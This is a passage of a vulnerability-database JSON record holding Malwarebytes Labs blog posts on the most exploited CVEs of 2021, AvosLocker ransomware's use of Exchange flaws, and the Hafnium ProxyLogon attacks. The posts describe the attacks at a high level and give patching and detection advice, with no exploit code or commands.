"THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1", "USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472", "UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "veracode", "idList": ["VERACODE:27548", "VERACODE:33244", "VERACODE:33337", "VERACODE:33348"]}, {"type": "vmware", "idList": ["VMSA-2021-0002", "VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:C5940EBF622709A929825B8B12592EF5", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdi", "idList": ["ZDI-20-258", "ZDI-21-819", "ZDI-21-821", "ZDI-21-822"]}, {"type": "zdt", "idList": ["1337DAY-ID-33133", "1337DAY-ID-33134", "1337DAY-ID-33140", "1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-34553", "1337DAY-ID-35274", "1337DAY-ID-35863", "1337DAY-ID-35879", "1337DAY-ID-35912", "1337DAY-ID-35944", "1337DAY-ID-36024", "1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36472", "1337DAY-ID-36667", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37080", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37781", "1337DAY-ID-37889"]}]}, "epss": [{"cve": "CVE-2018-13379", "epss": "0.974950000", "percentile": "0.999510000", "modified": "2023-03-19"}, {"cve": "CVE-2019-11510", "epss": "0.975040000", "percentile": "0.999580000", "modified": "2023-03-19"}, {"cve": "CVE-2020-0688", "epss": "0.974270000", "percentile": "0.998740000", "modified": "2023-03-19"}, {"cve": "CVE-2020-1472", "epss": "0.973850000", "percentile": "0.998190000", "modified": "2023-03-19"}, {"cve": "CVE-2021-21972", "epss": "0.973850000", "percentile": "0.998190000", "modified": "2023-03-19"}, {"cve": "CVE-2021-26084", "epss": "0.974760000", "percentile": "0.999340000", "modified": "2023-03-19"}, {"cve": "CVE-2021-26855", "epss": "0.975430000", "percentile": "0.999880000", "modified": "2023-03-19"}, {"cve": "CVE-2021-26857", "epss": "0.053690000", "percentile": "0.918980000", "modified": "2023-03-19"}, {"cve": "CVE-2021-26858", "epss": "0.106070000", "percentile": "0.940940000", "modified": "2023-03-19"}, {"cve": "CVE-2021-27065", "epss": "0.943940000", "percentile": "0.986930000", "modified": "2023-03-19"}, {"cve": "CVE-2021-31207", "epss": "0.971850000", "percentile": "0.996470000", "modified": "2023-03-19"}, {"cve": "CVE-2021-34473", "epss": "0.974090000", "percentile": "0.998470000", "modified": "2023-03-19"}, {"cve": "CVE-2021-34523", "epss": "0.975070000", "percentile": "0.999600000", "modified": "2023-03-19"}, {"cve": "CVE-2021-40539", "epss": "0.975260000", "percentile": "0.999760000", "modified": "2023-03-19"}, {"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-19"}], "vulnersScore": 0.7}, "_state": {"dependencies": 1659994789, "score": 1698845847, "epss": 1679291388}, "_internal": {"score_hash": "5a120661f46eda0e286b7a8f8fddf8c0"}}

{"malwarebytes": [{"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are 3 vulnerabilities that we commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\nThe vulnerabilities were found in Microsoft Exchange Server, which has a large userbase and which is usually set up as an Internet-facing instance. Plus, many publications have provided proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-2685](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the 4 CVE\u2019s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these "requirements" move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T21:27:45", "description": "The FBI has issued an[ advisory](<https://www.ic3.gov/Media/News/2022/220318.pdf>) about the AvosLocker ransomware. Notably the FBI has noticed that several victims have reported Microsoft Exchange Server vulnerabilities as the intrusion vector. \n\nAvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including financial services, critical manufacturing, and government facilities.\n\n## Threat profile\n\nAvosLocker ransomware is a multi-threaded Windows executable written in C++ that runs as a console application and shows a log of actions performed on victim systems. AvosLocker ransomware encrypts files on a victim\u2019s server and renames them with the \u201c.avos\u201d extension.\n\nThe AvosLocker executable leaves a ransom note called GET_YOUR_FILES_BACK.txt in all directories where encryption occurs. The ransom note includes a .onion site that contains instructions for paying the ransom and receiving a decryption key.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/ransom_note-1-600x313.png)\n\n> _Attention!_\n> \n> _Your systems have been encrypted, and your confidential documents were downloaded._\n> \n> _In order to restore your data, you must pay for the decryption key & application._\n> \n> _You may do so by visiting us at <onion address>._\n> \n> _This is an onion address that you may access using Tor Browser which you may download at <https://www.torproject.org/download/>_\n> \n> _Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website._\n> \n> _Contact us soon, because those who don\u2019t have their data leaked in our press release blog and the price they\u2019ll have to pay will go up significantly._\n> \n> _The corporations whom don\u2019t pay or fail to respond in a swift manner have their data leaked in our blog, accessible at <onion address>_\n\nSo, besides encrypting your files, AvosLocker also exfiltrates data and threatens to publish the stolen data to its leaks site. The public leak site not only lists victims of AvosLocker, along with a sample of data allegedly stolen from the victim\u2019s network, but also gives visitors an opportunity to view a sample of victim data and to purchase that data.\n\nThe FBI also notes that in some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the .onion site to negotiate, and threatens to post stolen data online. In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations.\n\n## Exchange vulnerabilities\n\nSince AvosLocker is a Ransomware-as-a-Service it may depend on the affiliate which of the vulnerabilities gets used.\n\nThe Exchange Server vulnerabilities are named as: CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, and CVE-2021-26855.\n\n[CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>): a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process. This is the way in.\n\n[CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>): a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions. This is how they take control.\n\n[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>): a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files. This allows the attacker to drop malware on the server and run it.\n\nThis is exactly the same attack chain we [described](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) in August 2021. This chain of attack was generally referred to as ProxyShell.\n\nAnother RCE vulnerability in Exchange Server has been seen as well:\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>): the ProxyLogon vulnerability which we discussed in detail in our article on [Microsoft Exchange attacks causing panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). The vulnerability allows an attacker to drop a webshell on a vulnerable Exchange Server. A web shell is a script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Obviously, not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\n## Mitigation\n\nAs we stated earlier, all these vulnerabilities have been patched. So, if you are wondering which updates to install next and you are running one or more Microsoft Exchange Server instances, starting there might be a good idea.\n\nMicrosoft\u2019s team has published a [script on GitHub](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that can check the status of protection against ProxyLogon vulnerabilities of Exchange servers.\n\n## Detection\n\nMalwarebytes detects AvosLocker as [Ransom.AvosLocker](<https://blog.malwarebytes.com/detections/ransom-avoslocker/>).\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/detection-2.png)_Malwarebytes blocks Ransom.AvosLocker_\n\nStay safe, everyone!\n\nThe post [AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI](<https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T21:09:12", "type": "malwarebytes", "title": "AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-21T21:09:12", "id": "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "href": "https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-16T10:27:50", "description": "Microsoft has detected multiple [zero-day](<https://blog.malwarebytes.com/glossary/zero-day/>) exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Microsoft attributes the attacks to a group they have dubbed Hafnium.\n\n> \u201cHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\u201d\n\n### The Hafnium attack group\n\nBesides a rare metal that chemically resembles zirconium, Hafnium is a newly identified attack group that is also thought to be responsible for other attacks on internet-facing servers, and typically exfiltrates data to [file sharing sites](<https://blog.malwarebytes.com/how-tos-2/2020/12/file-sharing-and-cloud-storage-sites-how-safe-are-they/>). Despite their use of leased servers in the US, the group is believed to be based in China (as most security researchers will tell you, attribution is hard, especially when it involves international espionage).\n\n### Exchange Server\n\nIn many organizations, internal cooperation depends on groupware solutions that enable the central administration of emails, calendars, contacts, and tasks. Microsoft Exchange Server is software that offers this functionality for Windows-based server systems.\n\nIn this case the attacker was using one of the zero-day vulnerabilities to steal the full contents of several user mailboxes from such servers.\n\n### Not one, but four zero-days\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The CVE\u2019s (with descriptions provided by Microsoft) used in these attacks were:\n\n * [**CVE-2021-26855**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26857**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26858**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-27065**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n\nThey all look the same. Boring you said? Read on!\n\n### The attack chain\n\nWhile the CVE description is the same for the 4 CVE\u2019s we can learn from the report by the security firm that discovered the attacks, Volexity, that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The Remote Code Execution (RCE) vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws \u2014 CVE-2021-26858 and CVE-2021-27065 \u2014 would allow an attacker to write a file to any part of the server.\n\nTogether these 4 vulnerabilities form a powerful attack chain which only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\n### Urgent patching necessary\n\nEven though the use of the vulnerabilities was described as \u201climited\u201d, now that the information has been made public, we may see a quick rise in the number of attacks. Especially since the attack does not require a lot of information about the victim to start with.\n\nOr as Microsoft\u2019s vice president for customer security Tom Burt put it:\n\n> \u201cEven though we\u2019ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\u201d\n\nUsers of Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019 are advised to apply the updates immediately to protect against these exploits, prioritizing the externally facing Exchange servers.\n\nMicrosoft also advises that the initial stage of the attack can be stopped by "restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access", although the other parts of the attack chain can still be exploited, if other means of access are used.\n\n### Update March 4, 2021\n\nThe Cybersecurity and Infrastructure Security Agency issued an [emergency directive](<https://cyber.dhs.gov/ed/21-02/>) after CISA partners observed active exploitation of vulnerabilities in Microsoft Exchange _on-premises_ products. The directive gives detailed instructions for agencies to follow immediately after identifying all instances of on-premises Microsoft Exchange Servers in their environment.\n\nFor readers that are interested in the more technical details of the attack chain, [Veloxity published a blog](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) that provides details about their investigation, the vulnerabilities, and which also includes IOCs.\n\n### Update March 5, 2021\n\nIt turns out that [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) was discovered in December of 2020 by DEVCORE who named the vulnerability ProxyLogon. They called it [ProxyLogon](<https://proxylogon.com/>) because this bug exploits against the Exchange **Proxy** Architecture and **Logon** mechanism. After DEVCORE chained the bugs together to a workable pre-auth RCE exploit, they sent an advisory and exploit to Microsoft through the MSRC portal. The entire timeline can be found [here](<https://proxylogon.com/#timeline>).\n\n### Update March 8, 2021\n\nMicrosoft has released an [updated script that scans Exchange log files](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021. The US Cybersecurity & Infrastructure Security Agency (CISA) has [issued a warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that it is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the script as soon as possible.\n\nMicrosoft has also added definitions to its standalone malware scanner, the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) (also known as the Microsoft Support Emergency Response Tool or MSERT), so that it detects web shells.\n\nMalwarebytes detects web shells planted on comprised Exchange servers as [Backdoor.Hafnium](<https://blog.malwarebytes.com/detections/backdoor-hafnium/>). You can read more about the use of web shells in Exchange server attacks in our article [Microsoft Exchange attacks cause panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>).\n\n### Update March 12, 2021\n\nThe abuse of these vulnerabilities has sky-rocketed, and the first public proof-of-concept (PoC) exploit for the ProxyLogon flaws has appeared on GitHub, only to be taken down by the site. In spite of Microsoft's efforts, cybercriminals have shown in numbers that they are exploiting this opportunity to the fullest.\n\nA new form of ransomware has also entered the mix. Detections for DearCry, a new form of human-operated ransomware that's deployed through compromised Exchange servers, began yesterday. When the ransomware was still unknown, it would have been detected by Malwarebytes proactively, as Malware.Ransom.Agent.Generic. \n\nYou can read more about DearCry ransomware attacks in our article [Ransomware is targeting vulnerable Microsoft Exchange servers](<https://blog.malwarebytes.com/ransomware/2021/03/ransomware-is-targeting-vulnerable-microsoft-exchange-servers/>).\n\n### Update March 16, 2021\n\nMicrosoft has released a new, one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\n\nDetails, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>). \n\nWe will keep you posted as we gather more information about these ransomware attacks.\n\nStay safe, everyone!\n\nThe post [Patch now! Exchange servers attacked by Hafnium 